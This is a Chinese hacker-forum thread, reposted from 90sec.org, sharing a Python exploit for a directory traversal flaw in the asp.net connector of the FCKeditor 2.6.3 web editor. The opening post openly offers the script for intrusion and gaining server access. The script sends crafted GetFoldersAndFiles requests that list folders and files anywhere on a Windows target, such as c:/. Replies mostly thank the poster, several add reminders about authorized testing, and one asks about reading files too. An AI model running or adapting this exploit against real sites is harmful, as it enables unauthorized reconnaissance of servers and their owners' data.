查看: 19939|回复: 8

转)最新FCKeditor编辑器asp.net目录遍历漏洞

[复制链接]
发表于 2013-11-27 21:43:30 | 显示全部楼层 |阅读模式
最新FCKeditor编辑器asp.net目录遍历漏洞
只针对Win平台 asp.net 的FCKeditor编辑器有效
目前只测试过FCKeditor编辑器2.6.3版本
我们经常在入侵渗透的过程中会遇到FCKeditor编辑器,在最新的版本中,很少有漏洞,所以更新了这个漏洞,希望能对大家在入侵渗透的过程中,利用这个漏洞来获取目标服务器的权限,最新FCKeditor编辑器asp.net存在目录遍历漏洞,请大家酌情进行友情监测

以下是最新FCKeditor编辑器asp.net目录遍历漏洞的漏洞利用代码,很好很强大

[Python] 查看源码 复制代码
#coding:utf-8
#code by 一丝不挂@90sec.org [url]http://www.jjsec.com[/url]
import getopt, sys, urllib, urllib2,string
from xml.etree import ElementTree
def read_Folder(text):
root = ElementTree.fromstring(text)
lst_node = root.getiterator(“Folder”)
for node in lst_node:
if node.attrib.has_key(“name”) > 0 :
print “<DIR> %s” % node.attrib['name']

def read_file(text):
root = ElementTree.fromstring(text)
lst_node = root.getiterator(“File”)
for node in lst_node:
if node.attrib.has_key(“name”) > 0 :
print “%s %s” % (node.attrib['size'],node.attrib['name'])
if len(sys.argv) < 2:
print “——————————————————–\r\n\r\n FCKeditor asp.net目录遍历Exploit\r\n Code by 一丝不挂@90sec.org\r\n\r\n使用方法:\r\n”+sys.argv[0]+” http:/www.jjsec.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx\r\n
输入 c:/ 按回车可遍历c盘目录\r\n
输入 exit 按回车退出程序\r\n\r\n——————————————————–”
sys.exit()

else:
url=sys.argv[1]
print “\r\n当前Url地址:”+url+”\r\n”
path = ”
while True:
path = raw_input(“[Ysbg@90sec "+path+"]# “)
if path == ‘exit’:
print ‘退出’
break
else:
req = urllib2.Request(url+”?Command=GetFoldersAndFiles&Type=File&CurrentFolder=”+urllib.quote(path.decode(sys.stdin.encoding).encode(‘utf8′)))
res = urllib2.urlopen(req)
html = res.read()
print “\r\n”+” “+path+” 的目录”
read_Folder(html)
print “\r\n”
#print “kb 文件名”
read_file(html)
print “\r\n”
res.close()



文章转自90sec.org

回复

使用道具 举报

发表于 2013-11-27 23:06:22 | 显示全部楼层
这个是就fck asp.net最新版的吗?我好像在乌云有人看到求。
回复 支持 反对

使用道具 举报

发表于 2013-11-28 04:39:41 | 显示全部楼层
谢谢分享
回复 支持 反对

使用道具 举报

发表于 2013-11-28 18:45:58 | 显示全部楼层
谢谢分享!
回复 支持 反对

使用道具 举报

头像被屏蔽
发表于 2013-11-28 20:01:11 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

头像被屏蔽
发表于 2014-1-7 16:30:32 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

发表于 2026-5-21 14:25:00 | 显示全部楼层

Re: 转)最新FCKeditor编辑器asp.net目录遍历漏洞

感谢分享!这个漏洞利用代码看起来很详细,对于安全测试人员来说是个不错的参考。不过提醒大家,请务必在获得授权的前提下进行测试,不要用于非法目的。另外,FCKeditor 已经停止维护多年,建议用户尽快迁移到更安全的编辑器。
回复 支持 反对

使用道具 举报

发表于 2026-6-20 19:00:03 | 显示全部楼层

Re: 转)最新FCKeditor编辑器asp.net目录遍历漏洞

感谢分享这个漏洞信息,之前确实没注意到FCKeditor的asp.net版本还有这个目录遍历问题。代码看起来可以直接用来测试,对于渗透测试人员来说挺实用的。不过提醒一下,大家测试时注意合法授权,别越界了。
回复 支持 反对

使用道具 举报

发表于 2026-6-20 21:10:02 | 显示全部楼层

Re: 转)最新FCKeditor编辑器asp.net目录遍历漏洞

感谢分享这个漏洞信息,代码很详细,对安全测试帮助很大。不过提醒一下,利用时务必在授权范围内进行,避免越权行为。另外,这个漏洞除了遍历目录外,能否进一步读取或下载文件?
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-8-27 14:08 , Processed in 0.022446 second(s), 17 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部